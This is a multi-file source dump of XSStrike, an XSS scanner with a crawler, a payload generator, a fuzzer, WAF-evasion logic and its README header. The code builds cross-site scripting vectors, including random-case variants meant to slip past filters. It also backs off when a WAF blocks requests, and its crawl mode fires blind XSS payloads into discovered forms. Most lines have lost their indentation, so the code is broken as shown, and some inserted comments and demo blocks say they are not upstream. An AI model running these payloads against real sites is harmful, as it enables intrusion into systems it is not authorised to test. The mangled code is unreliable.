    difference = [float('inf'), {}]  # start with an impossibly large difference
for index, i in numbers.items():
diff = abs(number - i)
if diff < difference[0]:
difference = [diff, {index: i}]
return difference[1]
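# Example (illustrative): closest(20, {0: 10, 1: 25}) returns {1: 25},
# the entry whose value is nearest to 20.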
def fillHoles(original, new):
filler = 0
filled = []
for x, y in zip(original, new):
if int(x) == (y + filler):
filled.append(y)
else:
filled.extend([0, y])
filler += (int(x) - y)
return filled
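# Example (illustrative): fillHoles([10, 20], [20]) returns [0, 20]; the
# reflection expected at position 10 is missing, so a 0 placeholder keeps
# the remaining positions aligned.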
def stripper(string, substring, direction='right'):
done = False
strippedString = ''
if direction == 'right':
string = string[::-1]
for char in string:
if char == substring and not done:
done = True
else:
strippedString += char
if direction == 'right':
strippedString = strippedString[::-1]
return strippedString
def extractHeaders(headers):
headers = headers.replace('\\n', '\n')
sorted_headers = {}
matches = re.findall(r'(.*):\s(.*)', headers)
for match in matches:
header = match[0]
value = match[1]
try:
if value[-1] == ',':
value = value[:-1]
sorted_headers[header] = value
except IndexError:
pass
return sorted_headers
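# Example (illustrative): extractHeaders('Cookie: sid=1\nX-Api-Key: secret')
# returns {'Cookie': 'sid=1', 'X-Api-Key': 'secret'}.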
def replaceValue(mapping, old, new, strategy=None):
"""
Replace old values with new ones following dict strategy.
The parameter strategy is None per default for inplace operation.
A copy operation is injected via strateg values like copy.copy
or copy.deepcopy
Note: A dict is returned regardless of modifications.
"""
anotherMap = strategy(mapping) if strategy else mapping
if old in anotherMap.values():
for k in anotherMap.keys():
if anotherMap[k] == old:
anotherMap[k] = new
return anotherMap
def getUrl(url, GET):
if GET:
return url.split('?')[0]
else:
return url
def extractScripts(response):
scripts = []
matches = re.findall(r'(?s)<script.*?>(.*?)</script>', response.lower())
for match in matches:
if xsschecker in match:
scripts.append(match)
return scripts
def randomUpper(string):
return ''.join(random.choice((x, y)) for x, y in zip(string.upper(), string.lower()))
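# Example (illustrative): randomUpper('alert') may return 'aLeRt' or 'ALerT',
# randomizing case to slip past case-sensitive filters.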
def flattenParams(currentParam, params, payload):
flatted = []
for name, value in params.items():
if name == currentParam:
value = payload
flatted.append(name + '=' + value)
return '?' + '&'.join(flatted)
def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
vectors = []
r = randomUpper # randomUpper randomly converts chars of a string to uppercase
for tag in tags:
if tag == 'd3v' or tag == 'a':
bait = xsschecker
else:
bait = ''
for eventHandler in eventHandlers:
# if the tag is compatible with the event handler
if tag in eventHandlers[eventHandler]:
for function in functions:
for filling in fillings:
for eFilling in eFillings:
for lFilling in lFillings:
for end in ends:
if tag == 'd3v' or tag == 'a':
if '>' in ends:
end = '>' # we can't use // as > with "a" or "d3v" tag
breaker = ''
if badTag:
breaker = '</' + r(badTag) + '>'
vector = breaker + '<' + r(tag) + filling + r(
eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
vectors.append(vector)
return vectors
def getParams(url, data, GET):
params = {}
if '?' in url and '=' in url:
data = url.split('?')[1]
if data[:1] == '?':
data = data[1:]
elif data:
if getVar('jsonData') or getVar('path'):
params = data
else:
try:
params = json.loads(data.replace('\'', '"'))
return params
except json.decoder.JSONDecodeError:
pass
else:
return None
if not params:
parts = data.split('&')
for part in parts:
each = part.split('=')
if len(each) < 2:
each.append('')
try:
params[each[0]] = each[1]
except IndexError:
params = None
return params
def writer(obj, path):
    if isinstance(obj, (list, tuple)):
        obj = '\n'.join(obj)
    elif isinstance(obj, dict):
        obj = json.dumps(obj, indent=4)
    with open(path, 'w+', encoding='utf-8') as savefile:
        savefile.write(str(obj))
def reader(path):
with open(path, 'r') as f:
result = [line.rstrip(
'\n').encode('utf-8').decode('utf-8') for line in f]
return result
def js_extractor(response):
"""Extract js files from the response body"""
scripts = []
matches = re.findall(r'<(?:script|SCRIPT).*?(?:src|SRC)=([^\s>]+)', response)
for match in matches:
match = match.replace('\'', '').replace('"', '').replace('`', '')
scripts.append(match)
return scripts
def handle_anchor(parent_url, url):
scheme = urlparse(parent_url).scheme
if url[:4] == 'http':
return url
elif url[:2] == '//':
return scheme + ':' + url
elif url.startswith('/'):
host = urlparse(parent_url).netloc
scheme = urlparse(parent_url).scheme
parent_url = scheme + '://' + host
return parent_url + url
elif parent_url.endswith('/'):
return parent_url + url
else:
return parent_url + '/' + url
def deJSON(data):
return data.replace('\\\\', '\\')
def getVar(name):
return core.config.globalVariables[name]
def updateVar(name, data, mode=None):
if mode:
if mode == 'append':
core.config.globalVariables[name].append(data)
elif mode == 'add':
core.config.globalVariables[name].add(data)
else:
core.config.globalVariables[name] = data
def isBadContext(position, non_executable_contexts):
badContext = ''
for each in non_executable_contexts:
if each[0] < position < each[1]:
badContext = each[2]
break
return badContext
def equalize(array, number):
    while len(array) < number:  # pad with empty strings up to the requested length
        array.append('')
def escaped(position, string):
    usable = string[:position][::-1]
    match = re.search(r'^\\*', usable)
    # an odd number of immediately preceding backslashes means the character is escaped
    return len(match.group()) % 2 == 1
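
# Hedged demo (not part of upstream): backslash parity decides escaping
# (run as `python -m core.utils` from the repo root).
if __name__ == '__main__':
    print(escaped(1, '\\"'))    # one backslash before the quote -> True
    print(escaped(2, '\\\\"'))  # two backslashes -> False, the backslash itself is escaped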
File: core/jsContexter.py
import re
from core.config import xsschecker
from core.utils import stripper
def jsContexter(script):
broken = script.split(xsschecker)
pre = broken[0]
# remove everything that is between {..}, "..." or '...'
pre = re.sub(r'(?s)\{.*?\}|(?s)\(.*?\)|(?s)".*?"|(?s)\'.*?\'', '', pre)
breaker = ''
num = 0
for char in pre: # iterate over the remaining characters
if char == '{':
breaker += '}'
elif char == '(':
breaker += ';)' # yes, it should be ); but we will invert the whole thing later
elif char == '[':
breaker += ']'
elif char == '/':
try:
if pre[num + 1] == '*':
breaker += '/*'
except IndexError:
pass
elif char == '}': # we encountered a } so we will strip off "our }" because this one does the job
breaker = stripper(breaker, '}')
        elif char == ')':  # we encountered a ) so we will strip off "our )" because this one does the job
            breaker = stripper(breaker, ')')
        elif char == ']':  # we encountered a ] so we will strip off "our ]" because this one does the job
            breaker = stripper(breaker, ']')
num += 1
return breaker[::-1] # invert the breaker string
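
# Hedged demo (not part of upstream): the probe lands inside an unclosed
# function call, so the computed breaker is ');' (quotes are handled separately
# by the generator). Run as `python -m core.jsContexter` from the repo root.
if __name__ == '__main__':
    print(jsContexter("var a = foo('" + xsschecker))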
File: core/fuzzer.py
import copy
from random import randint
from time import sleep
from urllib.parse import unquote
from core.colors import end, red, green, yellow
from core.config import fuzzes, xsschecker
from core.requester import requester
from core.utils import replaceValue, counter
from core.log import setup_logger
logger = setup_logger(__name__)
def fuzzer(url, params, headers, GET, delay, timeout, WAF, encoding):
for fuzz in fuzzes:
t = delay + randint(delay, delay * 2) + counter(fuzz)
sleep(t)
try:
if encoding:
fuzz = encoding(unquote(fuzz))
data = replaceValue(params, xsschecker, fuzz, copy.deepcopy)
response = requester(url, data, headers, GET, delay/2, timeout)
except:
logger.error('WAF is dropping suspicious requests.')
if delay == 0:
logger.info('Delay has been increased to %s6%s seconds.' % (green, end))
delay += 6
            limit = (delay + 1) * 50
            for remaining in range(limit, 0, -1):  # visible countdown until fuzzing resumes
                logger.info('\rFuzzing will continue after %s%i%s seconds.\t\t\r' % (green, remaining, end))
                sleep(1)
            try:
                requester(url, params, headers, GET, 0, 10)
                logger.good('Pheww! Looks like sleeping for %s%i%s seconds worked!' % (
                    green, limit, end))
except:
logger.error('\nLooks like WAF has blocked our IP Address. Sorry!')
break
if encoding:
fuzz = encoding(fuzz)
if fuzz.lower() in response.text.lower(): # if fuzz string is reflected in the response
result = ('%s[passed] %s' % (green, end))
# if the server returned an error (Maybe WAF blocked it)
elif str(response.status_code)[:1] != '2':
result = ('%s[blocked] %s' % (red, end))
else: # if the fuzz string was not reflected in the response completely
result = ('%s[filtered]%s' % (yellow, end))
logger.info('%s %s' % (result, fuzz))
File: core/filterChecker.py
from core.checker import checker
def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
positions = occurences.keys()
sortedEfficiencies = {}
# adding < > to environments anyway because they can be used in all contexts
environments = set(['<', '>'])
for i in range(len(positions)):
sortedEfficiencies[i] = {}
for i in occurences:
occurences[i]['score'] = {}
context = occurences[i]['context']
if context == 'comment':
environments.add('-->')
elif context == 'script':
environments.add(occurences[i]['details']['quote'])
environments.add('</scRipT/>')
elif context == 'attribute':
if occurences[i]['details']['type'] == 'value':
if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
environments.add('<') # so let's add the html entity
environments.add('>') # encoded versions of < and >
if occurences[i]['details']['quote']:
environments.add(occurences[i]['details']['quote'])
for environment in environments:
if environment:
efficiencies = checker(
url, params, headers, GET, delay, environment, positions, timeout, encoding)
efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
for occurence, efficiency in zip(occurences, efficiencies):
occurences[occurence]['score'][environment] = efficiency
return occurences
File: core/prompt.py
import os
import tempfile
from core.config import defaultEditor
from core.colors import white, yellow
from core.log import setup_logger
logger = setup_logger(__name__)
def prompt(default=None):
# try assigning default editor, if fails, use default
editor = os.environ.get('EDITOR', defaultEditor)
# create a temporary file and open it
with tempfile.NamedTemporaryFile(mode='r+') as tmpfile:
if default: # if prompt should have some predefined text
tmpfile.write(default)
tmpfile.flush()
child_pid = os.fork()
is_child = child_pid == 0
if is_child:
# opens the file in the editor
try:
os.execvp(editor, [editor, tmpfile.name])
except FileNotFoundError:
                logger.error('You don\'t have a default $EDITOR \
value defined and the \'nano\' text editor isn\'t available')
                logger.info('Execute %s`export EDITOR=/path/to/your/editor` \
%sand then run XSStrike again.\n\n' % (yellow, white))
exit(1)
else:
os.waitpid(child_pid, 0) # wait till the editor gets closed
tmpfile.seek(0)
return tmpfile.read().strip() # read the file
File: core/checker.py
import copy
from fuzzywuzzy import fuzz
import re
from urllib.parse import unquote
from core.config import xsschecker
from core.requester import requester
from core.utils import replaceValue, fillHoles
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
checkString = 'st4r7s' + payload + '3nd'
if encoding:
checkString = encoding(unquote(checkString))
response = requester(url, replaceValue(
params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
reflectedPositions = []
for match in re.finditer('st4r7s', response):
reflectedPositions.append(match.start())
filledPositions = fillHoles(positions, reflectedPositions)
    # Iterating over the reflections
num = 0
efficiencies = []
for position in filledPositions:
allEfficiencies = []
try:
reflected = response[reflectedPositions[num]
:reflectedPositions[num]+len(checkString)]
efficiency = fuzz.partial_ratio(reflected, checkString.lower())
allEfficiencies.append(efficiency)
except IndexError:
pass
if position:
reflected = response[position:position+len(checkString)]
if encoding:
checkString = encoding(checkString.lower())
efficiency = fuzz.partial_ratio(reflected, checkString)
if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
efficiency = 90
allEfficiencies.append(efficiency)
efficiencies.append(max(allEfficiencies))
else:
efficiencies.append(0)
num += 1
return list(filter(None, efficiencies))
File: core/photon.py
import re
import concurrent.futures
from urllib.parse import urlparse
from core.dom import dom
from core.log import setup_logger
from core.utils import getUrl, getParams
from core.requester import requester
from core.zetanize import zetanize
from plugins.retireJs import retireJs
logger = setup_logger(__name__)
def photon(seedUrl, headers, level, threadCount, delay, timeout, skipDOM):
forms = [] # web forms
processed = set() # urls that have been crawled
storage = set() # urls that belong to the target i.e. in-scope
schema = urlparse(seedUrl).scheme # extract the scheme e.g. http or https
host = urlparse(seedUrl).netloc # extract the host e.g. example.com
main_url = schema + '://' + host # join scheme and host to make the root url
storage.add(seedUrl) # add the url to storage
checkedDOMs = []
def rec(target):
processed.add(target)
printableTarget = '/'.join(target.split('/')[3:])
if len(printableTarget) > 40:
printableTarget = printableTarget[-40:]
else:
printableTarget = (printableTarget + (' ' * (40 - len(printableTarget))))
logger.run('Parsing %s\r' % printableTarget)
url = getUrl(target, True)
params = getParams(target, '', True)
if '=' in target: # if there's a = in the url, there should be GET parameters
inps = []
for name, value in params.items():
inps.append({'name': name, 'value': value})
forms.append({0: {'action': url, 'method': 'get', 'inputs': inps}})
response = requester(url, params, headers, True, delay, timeout).text
retireJs(url, response)
if not skipDOM:
highlighted = dom(response)
clean_highlighted = ''.join([re.sub(r'^\d+\s+', '', line) for line in highlighted])
if highlighted and clean_highlighted not in checkedDOMs:
checkedDOMs.append(clean_highlighted)
logger.good('Potentially vulnerable objects found at %s' % url)
logger.red_line(level='good')
for line in highlighted:
logger.no_format(line, level='good')
logger.red_line(level='good')
forms.append(zetanize(response))
matches = re.findall(r'<[aA].*href=["\']{0,1}(.*?)["\']', response)
for link in matches: # iterate over the matches
# remove everything after a "#" to deal with in-page anchors
link = link.split('#')[0]
if link.endswith(('.pdf', '.png', '.jpg', '.jpeg', '.xls', '.xml', '.docx', '.doc')):
pass
else:
if link[:4] == 'http':
if link.startswith(main_url):
storage.add(link)
elif link[:2] == '//':
if link.split('/')[2].startswith(host):
storage.add(schema + link)
elif link[:1] == '/':
storage.add(main_url + link)
else:
storage.add(main_url + '/' + link)
try:
for x in range(level):
urls = storage - processed # urls to crawl = all urls - urls that have been crawled
# for url in urls:
# rec(url)
threadpool = concurrent.futures.ThreadPoolExecutor(
max_workers=threadCount)
futures = (threadpool.submit(rec, url) for url in urls)
for i in concurrent.futures.as_completed(futures):
pass
except KeyboardInterrupt:
return [forms, processed]
return [forms, processed]
File: core/dom.py
import re
from core.colors import end, red, yellow
if len(end) < 1:
end = red = yellow = '*'
def dom(response):
highlighted = []
    sources = r'''\b(?:document\.(URL|documentURI|URLUnencoded|baseURI|cookie|referrer)|location\.(href|search|hash|pathname)|window\.name|history\.(pushState|replaceState)|(local|session)Storage)\b'''
    sinks = r'''\b(?:eval|evaluate|execCommand|assign|navigate|getResponseHeader|open|showModalDialog|Function|set(Timeout|Interval|Immediate)|execScript|crypto\.generateCRMFRequest|ScriptElement\.(src|text|textContent|innerText)|.*?\.onEventName|document\.(write|writeln)|.*?\.innerHTML|Range\.createContextualFragment|(document|window)\.location)\b'''
scripts = re.findall(r'(?i)(?s)<script[^>]*>(.*?)</script>', response)
sinkFound, sourceFound = False, False
for script in scripts:
script = script.split('\n')
num = 1
allControlledVariables = set()
try:
for newLine in script:
line = newLine
parts = line.split('var ')
controlledVariables = set()
if len(parts) > 1:
for part in parts:
for controlledVariable in allControlledVariables:
if controlledVariable in part:
                                controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', r'\$'))
pattern = re.finditer(sources, newLine)
for grp in pattern:
if grp:
source = newLine[grp.start():grp.end()].replace(' ', '')
if source:
if len(parts) > 1:
for part in parts:
if source in part:
                                        controlledVariables.add(re.search(r'[a-zA-Z$_][a-zA-Z0-9$_]+', part).group().replace('$', r'\$'))
line = line.replace(source, yellow + source + end)
for controlledVariable in controlledVariables:
allControlledVariables.add(controlledVariable)
for controlledVariable in allControlledVariables:
matches = list(filter(None, re.findall(r'\b%s\b' % controlledVariable, line)))
if matches:
sourceFound = True
line = re.sub(r'\b%s\b' % controlledVariable, yellow + controlledVariable + end, line)
pattern = re.finditer(sinks, newLine)
for grp in pattern:
if grp:
sink = newLine[grp.start():grp.end()].replace(' ', '')
if sink:
line = line.replace(sink, red + sink + end)
sinkFound = True
if line != newLine:
highlighted.append('%-3s %s' % (str(num), line.lstrip(' ')))
num += 1
except MemoryError:
pass
if sinkFound or sourceFound:
return highlighted
else:
return []
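
# Hedged demo (not part of upstream): a source (location.hash) flowing into a
# sink (document.write) gets highlighted. Run as `python -m core.dom`.
if __name__ == '__main__':
    page = '<script>var q = location.hash; document.write(q);</script>'
    for line in dom(page):
        print(line)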
File: core/colors.py
import sys
import os
import platform
colors = True # Output should be colored
machine = sys.platform # Detecting the os of current system
checkplatform = platform.platform() # Get current version of OS
if machine.lower().startswith(('os', 'win', 'darwin', 'ios')):
colors = False # Colors shouldn't be displayed on mac & windows
if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586:
colors = True
os.system('') # Enables the ANSI
if not colors:
    end = red = white = green = yellow = run = bad = good = info = que = back = ''
else:
white = '\033[97m'
green = '\033[92m'
red = '\033[91m'
yellow = '\033[93m'
end = '\033[0m'
back = '\033[7;91m'
info = '\033[93m[!]\033[0m'
que = '\033[94m[?]\033[0m'
bad = '\033[91m[-]\033[0m'
good = '\033[92m[+]\033[0m'
run = '\033[97m[~]\033[0m'
File: modes/crawl.py
import copy
import re
import core.config
from core.colors import green, end
from core.config import xsschecker
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.log import setup_logger
logger = setup_logger(__name__)
def crawl(scheme, host, main_url, form, blindXSS, blindPayload, headers, delay, timeout, encoding):
if form:
for each in form.values():
url = each['action']
if url:
if url.startswith(main_url):
pass
elif url.startswith('//') and url[2:].startswith(host):
url = scheme + '://' + url[2:]
elif url.startswith('/'):
url = scheme + '://' + host + url
elif re.match(r'\w', url[0]):
url = scheme + '://' + host + '/' + url
if url not in core.config.globalVariables['checkedForms']:
core.config.globalVariables['checkedForms'][url] = []
method = each['method']
GET = True if method == 'get' else False
inputs = each['inputs']
paramData = {}
for one in inputs:
paramData[one['name']] = one['value']
for paramName in paramData.keys():
if paramName not in core.config.globalVariables['checkedForms'][url]:
core.config.globalVariables['checkedForms'][url].append(paramName)
paramsCopy = copy.deepcopy(paramData)
paramsCopy[paramName] = xsschecker
response = requester(
url, paramsCopy, headers, GET, delay, timeout)
occurences = htmlParser(response, encoding)
positions = occurences.keys()
occurences = filterChecker(
url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
vectors = generator(occurences, response.text)
if vectors:
for confidence, vects in vectors.items():
try:
payload = list(vects)[0]
logger.vuln('Vulnerable webpage: %s%s%s' %
(green, url, end))
logger.vuln('Vector for %s%s%s: %s' %
(green, paramName, end, payload))
break
except IndexError:
pass
if blindXSS and blindPayload:
paramsCopy[paramName] = blindPayload
requester(url, paramsCopy, headers,
GET, delay, timeout)
File: modes/singleFuzz.py
import copy
from urllib.parse import urlparse
from core.colors import green, end
from core.config import xsschecker
from core.fuzzer import fuzzer
from core.requester import requester
from core.utils import getUrl, getParams
from core.wafDetector import wafDetector
from core.log import setup_logger
logger = setup_logger(__name__)
def singleFuzz(target, paramData, encoding, headers, delay, timeout):
GET, POST = (False, True) if paramData else (True, False)
# If the user hasn't supplied the root url with http(s), we will handle it
if not target.startswith('http'):
try:
response = requester('https://' + target, {},
headers, GET, delay, timeout)
target = 'https://' + target
except:
target = 'http://' + target
logger.debug('Single Fuzz target: {}'.format(target))
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Single fuzz host: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Single fuzz url: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Single fuzz params:', params)
if not params:
logger.error('No parameters to test.')
quit()
WAF = wafDetector(
url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
if WAF:
logger.error('WAF detected: %s%s%s' % (green, WAF, end))
else:
logger.good('WAF Status: %sOffline%s' % (green, end))
for paramName in params.keys():
logger.info('Fuzzing parameter: %s' % paramName)
paramsCopy = copy.deepcopy(params)
paramsCopy[paramName] = xsschecker
fuzzer(url, paramsCopy, headers, GET,
delay, timeout, WAF, encoding)
File: modes/__init__.py
File: modes/bruteforcer.py
import copy
from urllib.parse import urlparse, unquote
from core.colors import good, green, end
from core.requester import requester
from core.utils import getUrl, getParams
from core.log import setup_logger
logger = setup_logger(__name__)
def bruteforcer(target, paramData, payloadList, encoding, headers, delay, timeout):
GET, POST = (False, True) if paramData else (True, False)
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Parsed host to bruteforce: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Parsed url to bruteforce: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Bruteforcer params:', params)
if not params:
logger.error('No parameters to test.')
quit()
for paramName in params.keys():
progress = 1
paramsCopy = copy.deepcopy(params)
for payload in payloadList:
logger.run('Bruteforcing %s[%s%s%s]%s: %i/%i\r' %
(green, end, paramName, green, end, progress, len(payloadList)))
if encoding:
payload = encoding(unquote(payload))
paramsCopy[paramName] = payload
response = requester(url, paramsCopy, headers,
GET, delay, timeout).text
if encoding:
payload = encoding(payload)
if payload in response:
logger.info('%s %s' % (good, payload))
progress += 1
logger.no_format('')
File: modes/scan.py
import copy
import re
from urllib.parse import urlparse, quote, unquote
from core.checker import checker
from core.colors import end, green, que
import core.config
from core.config import xsschecker, minEfficiency
from core.dom import dom
from core.filterChecker import filterChecker
from core.generator import generator
from core.htmlParser import htmlParser
from core.requester import requester
from core.utils import getUrl, getParams, getVar
from core.wafDetector import wafDetector
from core.log import setup_logger
logger = setup_logger(__name__)
def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, skip):
GET, POST = (False, True) if paramData else (True, False)
# If the user hasn't supplied the root url with http(s), we will handle it
if not target.startswith('http'):
try:
response = requester('https://' + target, {},
headers, GET, delay, timeout)
target = 'https://' + target
except:
target = 'http://' + target
logger.debug('Scan target: {}'.format(target))
response = requester(target, {}, headers, GET, delay, timeout).text
if not skipDOM:
logger.run('Checking for DOM vulnerabilities')
highlighted = dom(response)
if highlighted:
logger.good('Potentially vulnerable objects found')
logger.red_line(level='good')
for line in highlighted:
logger.no_format(line, level='good')
logger.red_line(level='good')
host = urlparse(target).netloc # Extracts host out of the url
logger.debug('Host to scan: {}'.format(host))
url = getUrl(target, GET)
logger.debug('Url to scan: {}'.format(url))
params = getParams(target, paramData, GET)
logger.debug_json('Scan parameters:', params)
if not params:
logger.error('No parameters to test.')
quit()
WAF = wafDetector(
url, {list(params.keys())[0]: xsschecker}, headers, GET, delay, timeout)
if WAF:
logger.error('WAF detected: %s%s%s' % (green, WAF, end))
else:
logger.good('WAF Status: %sOffline%s' % (green, end))
for paramName in params.keys():
paramsCopy = copy.deepcopy(params)
logger.info('Testing parameter: %s' % paramName)
if encoding:
paramsCopy[paramName] = encoding(xsschecker)
else:
paramsCopy[paramName] = xsschecker
response = requester(url, paramsCopy, headers, GET, delay, timeout)
occurences = htmlParser(response, encoding)
positions = occurences.keys()
logger.debug('Scan occurences: {}'.format(occurences))
if not occurences:
logger.error('No reflection found')
continue
else:
logger.info('Reflections found: %i' % len(occurences))
logger.run('Analysing reflections')
efficiencies = filterChecker(
url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
logger.debug('Scan efficiencies: {}'.format(efficiencies))
logger.run('Generating payloads')
vectors = generator(occurences, response.text)
total = 0
for v in vectors.values():
total += len(v)
if total == 0:
logger.error('No vectors were crafted.')
continue
logger.info('Payloads generated: %i' % total)
progress = 0
for confidence, vects in vectors.items():
for vect in vects:
if core.config.globalVariables['path']:
vect = vect.replace('/', '%2F')
loggerVector = vect
progress += 1
logger.run('Progress: %i/%i\r' % (progress, total))
if not GET:
vect = unquote(vect)
efficiencies = checker(
url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding)
if not efficiencies:
for i in range(len(occurences)):
efficiencies.append(0)
bestEfficiency = max(efficiencies)
if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
if not skip:
choice = input(
'%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
logger.no_format('')

File: plugins/__init__.py


File: plugins/retireJs.py

import re
import json
import hashlib
from urllib.parse import urlparse
from core.colors import green, end
from core.requester import requester
from core.utils import deJSON, js_extractor, handle_anchor, getVar, updateVar
from core.log import setup_logger
logger = setup_logger(__name__)
def is_defined(o):
return o is not None
def scan(data, extractor, definitions, matcher=None):
matcher = matcher or _simple_match
detected = []
for component in definitions:
extractors = definitions[component].get(
"extractors", None).get(
extractor, None)
if (not is_defined(extractors)):
continue
for i in extractors:
match = matcher(i, data)
if (match):
detected.append({"version": match,
"component": component,
"detection": extractor})
return detected
def _simple_match(regex, data):
regex = deJSON(regex)
match = re.search(regex, data)
return match.group(1) if match else None
def _replacement_match(regex, data):
try:
regex = deJSON(regex)
group_parts_of_regex = r'^\/(.*[^\\])\/([^\/]+)\/$'
ar = re.search(group_parts_of_regex, regex)
search_for_regex = "(" + ar.group(1) + ")"
match = re.search(search_for_regex, data)
ver = None
if (match):
ver = re.sub(ar.group(1), ar.group(2), match.group(0))
return ver
return None
except:
return None
def _scanhash(hash, definitions):
for component in definitions:
hashes = definitions[component].get("extractors", None).get("hashes", None)
if (not is_defined(hashes)):
continue
for i in hashes:
if (i == hash):
return [{"version": hashes[i],
"component": component,
"detection": 'hash'}]
return []
def check(results, definitions):
for r in results:
result = r
if (not is_defined(definitions[result.get("component", None)])):
continue
vulns = definitions[
result.get(
"component",
None)].get(
"vulnerabilities",
None)
for i in range(len(vulns)):
if (not _is_at_or_above(result.get("version", None),
vulns[i].get("below", None))):
if (is_defined(vulns[i].get("atOrAbove", None)) and not _is_at_or_above(
result.get("version", None), vulns[i].get("atOrAbove", None))):
continue
vulnerability = {"info": vulns[i].get("info", None)}
if (vulns[i].get("severity", None)):
vulnerability["severity"] = vulns[i].get("severity", None)
if (vulns[i].get("identifiers", None)):
vulnerability["identifiers"] = vulns[
i].get("identifiers", None)
result["vulnerabilities"] = result.get(
"vulnerabilities", None) or []
result["vulnerabilities"].append(vulnerability)
return results
def unique(ar):
return list(set(ar))
def _is_at_or_above(version1, version2):
# print "[",version1,",", version2,"]"
v1 = re.split(r'[.-]', version1)
v2 = re.split(r'[.-]', version2)
l = len(v1) if len(v1) > len(v2) else len(v2)
for i in range(l):
v1_c = _to_comparable(v1[i] if len(v1) > i else None)
v2_c = _to_comparable(v2[i] if len(v2) > i else None)
if (not isinstance(v1_c, type(v2_c))):
return isinstance(v1_c, int)
if (v1_c > v2_c):
return True
if (v1_c < v2_c):
return False
return True
def _to_comparable(n):
if (not is_defined(n)):
return 0
if (re.search(r'^[0-9]+$', n)):
return int(str(n), 10)
return n
def _replace_version(jsRepoJsonAsText):
    return re.sub(r'[.0-9]*', r'[0-9][0-9.a-z_\-]+', jsRepoJsonAsText)
def is_vulnerable(results):
for r in results:
if ('vulnerabilities' in r):
return True
return False
def scan_uri(uri, definitions):
result = scan(uri, 'uri', definitions)
return check(result, definitions)
def scan_filename(fileName, definitions):
result = scan(fileName, 'filename', definitions)
return check(result, definitions)
def scan_file_content(content, definitions):
result = scan(content, 'filecontent', definitions)
if (len(result) == 0):
result = scan(content, 'filecontentreplace', definitions, _replacement_match)
if (len(result) == 0):
result = _scanhash(
hashlib.sha1(
content.encode('utf8')).hexdigest(),
definitions)
return check(result, definitions)
def main_scanner(uri, response):
definitions = getVar('definitions')
uri_scan_result = scan_uri(uri, definitions)
filecontent = response
filecontent_scan_result = scan_file_content(filecontent, definitions)
uri_scan_result.extend(filecontent_scan_result)
result = {}
if uri_scan_result:
result['component'] = uri_scan_result[0]['component']
result['version'] = uri_scan_result[0]['version']
result['vulnerabilities'] = []
vulnerabilities = set()
for i in uri_scan_result:
k = set()
try:
for j in i['vulnerabilities']:
vulnerabilities.add(str(j))
except KeyError:
pass
for vulnerability in vulnerabilities:
result['vulnerabilities'].append(json.loads(vulnerability.replace('\'', '"')))
return result
def retireJs(url, response):
scripts = js_extractor(response)
for script in scripts:
if script not in getVar('checkedScripts'):
updateVar('checkedScripts', script, 'add')
uri = handle_anchor(url, script)
response = requester(uri, '', getVar('headers'), True, getVar('delay'), getVar('timeout')).text
result = main_scanner(uri, response)
if result:
logger.red_line()
logger.good('Vulnerable component: ' + result['component'] + ' v' + result['version'])
logger.info('Component location: %s' % uri)
details = result['vulnerabilities']
logger.info('Total vulnerabilities: %i' % len(details))
for detail in details:
logger.info('%sSummary:%s %s' % (green, end, detail['identifiers']['summary']))
logger.info('Severity: %s' % detail['severity'])
logger.info('CVE: %s' % detail['identifiers']['CVE'][0])
logger.red_line()
<h1 align="center">
<br>
<a href="https://github.com/s0md3v/XSStrike"><img src="https://image.ibb.co/cpuYoA/xsstrike-logo.png" alt="XSStrike"></a>
<br>
XSStrike
<br>
</h1>
<h4 align="center">Advanced XSS Detection Suite</h4>
<p align="center">
<a href="https://github.com/s0md3v/XSStrike/releases">
<img src="https://img.shields.io/github/release/s0md3v/XSStrike.svg">
</a>
<a href="https://travis-ci.com/s0md3v/XSStrike">
<img src="https://img.shields.io/travis/com/s0md3v/XSStrike.svg">
</a>
<a href="https://github.com/s0md3v/XSStrike/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/s0md3v/XSStrike.svg">
</a>
</p>
![multi xss](https://image.ibb.co/gOCV5L/Screenshot-2018-11-19-13-33-49.png)
<p align="center">
<a href="https://github.com/s0md3v/XSStrike/wiki">XSStrike Wiki</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/Usage">Usage</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/FAQ">FAQ</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/For-Developers">For Developers</a> •
<a href="https://github.com/s0md3v/XSStrike/wiki/Compatibility-&-Dependencies">Compatibility</a> •
<a href="https://github.com/s0md3v/XSStrike#gallery">Gallery</a>
</p>
XSStrike is a Cross Site Scripting detection suite equipped with four hand-written parsers, an intelligent payload generator, a powerful fuzzing engine and an incredibly fast crawler.
